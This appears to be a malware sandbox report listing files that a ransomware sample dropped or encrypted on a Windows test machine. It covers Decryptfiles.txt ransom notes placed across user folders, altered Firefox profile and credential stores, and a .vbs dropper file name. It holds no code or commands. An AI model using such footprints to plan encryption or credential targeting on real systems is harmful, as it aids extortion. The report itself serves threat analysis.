C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\010cab1b-3626-48b5-9d6b-0e4dfe4db5fa
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\01e461df-d85d-4561-a852-205de2d67f32
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\054622d9-6ed7-4f25-87fd-b3a9cd668b65
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\12672553-cb8c-4210-ae02-a59c1a541208
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\2b167346-5f76-4c00-8f97-19cee0df0fba
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\372e391e-787d-40e8-8beb-44106d6c22f4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\3b7fc3d4-90d3-48a3-834f-e61d315e9a5c
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\58b46d46-b146-420f-81af-5b32c19a8aef
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\59bd13a9-8183-4ac7-8723-9621ae6d3748
OpenPGP Public Key
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\5e0297e1-aa9b-4634-aaf1-cfd1f718b993
OpenPGP Public Key
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\6c257ec7-9ee7-4e42-91a6-7d3b50c23b76
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\6db12043-3902-4d45-8c5d-d992fbf6d4e7
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\758d1c71-5fff-4193-9977-7a57afa68bf7
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7917ce80-55b3-46ca-99c2-70537bbb959a
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7a27ea16-e265-40c0-823c-0125abf7d855
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7b2ddd96-6d27-491a-a7e0-811ed320f1f0
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7f0194d6-62d6-4174-a7ed-55ebc13aacb4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\b3c274f7-6fd8-4832-989b-74a48f86b6b5
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\c64980e6-c743-4793-ba4a-89f593d4eb16
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\e6e57dc0-d354-4d4a-8374-548b8e2bcc5d
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\f5c2d345-4cad-4c1a-a51d-15d682036066
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\tmp\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\session-state.json
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\state.json
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\extensions.json
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-shm
COM executable for DOS
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-shm.HtvE (copy)
COM executable for DOS
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-wal.kIhf
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\handlers.json
COM executable for DOS
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\handlers.json.IXZn (copy)
COM executable for DOS
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\minidumps\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\parent.lock.FXRH
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\permissions.sqlite
OpenPGP Secret Key
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal.YNXd
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\protections.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\18a05d94-e006-440f-b702-3e398a280dbf
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\2c8e5eea-375d-48a9-ad4c-be583ff1215d
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\3be89113-af2b-4b48-9c47-40ac1156f7a2
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\6260e81e-5ef5-4137-a0a5-7930ea6f0a75
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\6786f292-c1be-4996-99cd-77aa855c1844
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\edd11145-a3b3-4ebf-ba7b-14b7ec08f19f
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\ff032c8b-05e6-43c9-9e84-732dbe7aca27
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore.jsonlz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\default\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\ls-archive.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\.metadata-v2
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal.YnEI
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal.ljOI
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal.tiBv
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
big endian ispell hash file (?),
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal.gJOW
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal.hQNu
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
OpenPGP Public Key
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal.MclI
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\targeting.snapshot.json
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\times.json
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-shm
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-wal.nxmV
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\xulstore.json.EBes
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\times.json
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\installs.ini
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
data
dropped
malicious
C:\Users\user\AppData\Roaming\_curlrc.SbgX
data
dropped
malicious
C:\Users\user\AppData\Roaming\com.adobe.dunamis\56079431-ea46-4833-94f9-1ff5658cdb1c\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\com.adobe.dunamis\61f56613-c62c-4b17-84dd-62b60d5776aa\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\com.adobe.dunamis\6d9d9777-7ded-4768-8191-9a707d72b009\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\com.adobe.dunamis\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\com.adobe.dunamis\f2eb6c79-671d-4de2-b7be-3b2eea7abc47\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Contacts\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\AQRFEVRTGL.png
data
dropped
malicious
C:\Users\user\Desktop\ATJBEMHSSB\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\BQJUWOYRTO.jpg
data
dropped
malicious
C:\Users\user\Desktop\BQJUWOYRTO\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\BUFZSQPCOH.png
data
dropped
malicious
C:\Users\user\Desktop\BWETZDQDIB.mp3
data
dropped
malicious
C:\Users\user\Desktop\BWETZDQDIB\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\GNLQNHOLWB.mp3
data
dropped
malicious
C:\Users\user\Desktop\HMPPSXQPQV.docx
data
dropped
malicious
C:\Users\user\Desktop\HMPPSXQPQV.jpg
data
dropped
malicious
C:\Users\user\Desktop\HMPPSXQPQV.xlsx
data
dropped
malicious
C:\Users\user\Desktop\HMPPSXQPQV\BQJUWOYRTO.jpg
data
dropped
malicious
C:\Users\user\Desktop\HMPPSXQPQV\BUFZSQPCOH.png
data
dropped
malicious
C:\Users\user\Desktop\HMPPSXQPQV\BWETZDQDIB.mp3
data
dropped
malicious
C:\Users\user\Desktop\HMPPSXQPQV\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\HMPPSXQPQV\HMPPSXQPQV.docx
data
dropped
malicious
C:\Users\user\Desktop\HMPPSXQPQV\QFAPOWPAFG.xlsx
data
dropped
malicious
C:\Users\user\Desktop\HQJBRDYKDE.png
data
dropped
malicious
C:\Users\user\Desktop\LFOPODGVOH.xlsx
data
dropped
malicious
C:\Users\user\Desktop\LFOPODGVOH\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\LFOPODGVOH\HMPPSXQPQV.xlsx
data
dropped
malicious
C:\Users\user\Desktop\LFOPODGVOH\LHEPQPGEWF.mp3
data
dropped
malicious
C:\Users\user\Desktop\LFOPODGVOH\QFAPOWPAFG.jpg
data
dropped
malicious
C:\Users\user\Desktop\LHEPQPGEWF.mp3
data
dropped
malicious
C:\Users\user\Desktop\LIJDSFKJZG.docx
data
dropped
malicious
C:\Users\user\Desktop\LIJDSFKJZG.pdf
data
dropped
malicious
C:\Users\user\Desktop\LIJDSFKJZG\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\LIJDSFKJZG\GNLQNHOLWB.mp3
data
dropped
malicious
C:\Users\user\Desktop\LIJDSFKJZG\PWZOQIFCAN.png
data
dropped
malicious
C:\Users\user\Desktop\LIJDSFKJZG\SNIPGPPREP.pdf
data
dropped
malicious
C:\Users\user\Desktop\LIJDSFKJZG\VWDFPKGDUF.xlsx
data
dropped
malicious
C:\Users\user\Desktop\NIRMEKAMZH\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS_1.vbs
data
dropped
malicious
C:\Users\user\Desktop\QFAPOWPAFG.jpg
data
dropped
malicious
C:\Users\user\Desktop\QFAPOWPAFG\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\SNIPGPPREP.pdf
data
dropped
malicious
C:\Users\user\Desktop\UBVUNTSCZJ\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\UNKRLCVOHV\AQRFEVRTGL.png
COM executable for DOS
dropped
malicious
C:\Users\user\Desktop\UNKRLCVOHV\AQRFEVRTGL.png.unVz (copy)
COM executable for DOS
dropped
malicious
C:\Users\user\Desktop\UNKRLCVOHV\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\UNKRLCVOHV\HMPPSXQPQV.jpg
data
dropped
malicious
C:\Users\user\Desktop\UNKRLCVOHV\LFOPODGVOH.xlsx
data
dropped
malicious
C:\Users\user\Desktop\UNKRLCVOHV\UNKRLCVOHV.docx
data
dropped
malicious
C:\Users\user\Desktop\VWDFPKGDUF.pdf
data
dropped
malicious
C:\Users\user\Desktop\VWDFPKGDUF.xlsx
data
dropped
malicious
C:\Users\user\Desktop\WDBWCPEFJW\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\WSHEJMDVQC\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\AQRFEVRTGL.png
data
dropped
malicious
C:\Users\user\Documents\ATJBEMHSSB\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\BQJUWOYRTO.jpg
data
dropped
malicious
C:\Users\user\Documents\BQJUWOYRTO\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\BUFZSQPCOH.png
data
dropped
malicious
C:\Users\user\Documents\BWETZDQDIB\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\GNLQNHOLWB.mp3
data
dropped
malicious
C:\Users\user\Documents\HMPPSXQPQV.docx
data
dropped
malicious
C:\Users\user\Documents\HMPPSXQPQV.jpg
data
dropped
malicious
C:\Users\user\Documents\HMPPSXQPQV.xlsx
data
dropped
malicious
C:\Users\user\Documents\HMPPSXQPQV\BUFZSQPCOH.png
data
dropped
malicious
C:\Users\user\Documents\HMPPSXQPQV\BWETZDQDIB.mp3
data
dropped
malicious
C:\Users\user\Documents\HMPPSXQPQV\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\HMPPSXQPQV\HMPPSXQPQV.docx
data
dropped
malicious
C:\Users\user\Documents\HMPPSXQPQV\LHEPQPGEWF.pdf
OpenPGP Public Key
dropped
malicious
C:\Users\user\Documents\HMPPSXQPQV\QFAPOWPAFG.xlsx
data
dropped
malicious
C:\Users\user\Documents\HQJBRDYKDE.png
data
dropped
malicious
C:\Users\user\Documents\LFOPODGVOH\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\LFOPODGVOH\HQJBRDYKDE.png
data
dropped
malicious
C:\Users\user\Documents\LFOPODGVOH\LFOPODGVOH.docx
OpenPGP Secret Key
dropped
malicious
C:\Users\user\Documents\LHEPQPGEWF.mp3
data
dropped
malicious
C:\Users\user\Documents\LIJDSFKJZG.pdf
data
dropped
malicious
C:\Users\user\Documents\LIJDSFKJZG\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\LIJDSFKJZG\GNLQNHOLWB.mp3
data
dropped
malicious
C:\Users\user\Documents\LIJDSFKJZG\LIJDSFKJZG.docx
PGP Secret Sub-key -
dropped
malicious
C:\Users\user\Documents\LIJDSFKJZG\PWZOQIFCAN.png
OpenPGP Secret Key
dropped
malicious
C:\Users\user\Documents\NIRMEKAMZH\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\PWZOQIFCAN.png
data
dropped
malicious
C:\Users\user\Documents\QFAPOWPAFG.xlsx
data
dropped
malicious
C:\Users\user\Documents\QFAPOWPAFG\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\SNIPGPPREP.pdf
data
dropped
malicious
C:\Users\user\Documents\UBVUNTSCZJ\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\UNKRLCVOHV.docx
data
dropped
malicious
C:\Users\user\Documents\UNKRLCVOHV\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\UNKRLCVOHV\HMPPSXQPQV.jpg
data
dropped
malicious
C:\Users\user\Documents\UNKRLCVOHV\UNKRLCVOHV.docx
data
dropped
malicious
C:\Users\user\Documents\UNKRLCVOHV\VWDFPKGDUF.mp3
data
dropped
malicious
C:\Users\user\Documents\VWDFPKGDUF.mp3
data
dropped
malicious
C:\Users\user\Documents\WDBWCPEFJW\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Documents\WSHEJMDVQC\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Downloads\BUFZSQPCOH.png
data
dropped
malicious
C:\Users\user\Downloads\BWETZDQDIB.mp3
data
dropped
malicious
C:\Users\user\Downloads\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Downloads\GNLQNHOLWB.mp3
data
dropped
malicious
C:\Users\user\Downloads\HMPPSXQPQV.docx
data
dropped
malicious
C:\Users\user\Downloads\HMPPSXQPQV.jpg
data
dropped
malicious
C:\Users\user\Downloads\HQJBRDYKDE.png
data
dropped
malicious
C:\Users\user\Downloads\LFOPODGVOH.docx
data
dropped
malicious
C:\Users\user\Downloads\LFOPODGVOH.xlsx
data
dropped
malicious
C:\Users\user\Downloads\LHEPQPGEWF.jpg
Dyalog APL aplcore version -21.-102
dropped
malicious
C:\Users\user\Downloads\LHEPQPGEWF.pdf
data
dropped
malicious
C:\Users\user\Downloads\LIJDSFKJZG.docx
data
dropped
malicious
C:\Users\user\Downloads\PWZOQIFCAN.png
data
dropped
malicious
C:\Users\user\Downloads\QFAPOWPAFG.jpg
data
dropped
malicious
C:\Users\user\Downloads\QFAPOWPAFG.xlsx
data
dropped
malicious
C:\Users\user\Downloads\UNKRLCVOHV.docx
data
dropped
malicious
C:\Users\user\Downloads\VWDFPKGDUF.mp3
data
dropped
malicious
C:\Users\user\Downloads\downloaded.pdf
data
dropped
malicious
C:\Users\user\Favorites\Amazon.url
OpenPGP Secret Key
dropped
malicious
C:\Users\user\Favorites\Bing.url
data
dropped
malicious
C:\Users\user\Favorites\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Favorites\Facebook.url
data
dropped
malicious
C:\Users\user\Favorites\Links\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Favorites\Live.url
OpenPGP Secret Key
dropped
malicious
C:\Users\user\Favorites\NYTimes.url
data
dropped
malicious
C:\Users\user\Favorites\Twitter.url
data
dropped
malicious
C:\Users\user\Favorites\Wikipedia.url
OpenPGP Secret Key
dropped
malicious
C:\Users\user\Favorites\Youtube.url
data
dropped
malicious
C:\Users\user\Links\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Music\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\NTUSER.DAT.PjJC
data
dropped
malicious
C:\Users\user\NTUSER.DAT.puvR
data
dropped
malicious
C:\Users\user\OneDrive\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Pictures\Camera Roll\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Pictures\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Pictures\Saved Pictures\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Recent\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Saved Games\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\Searches\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
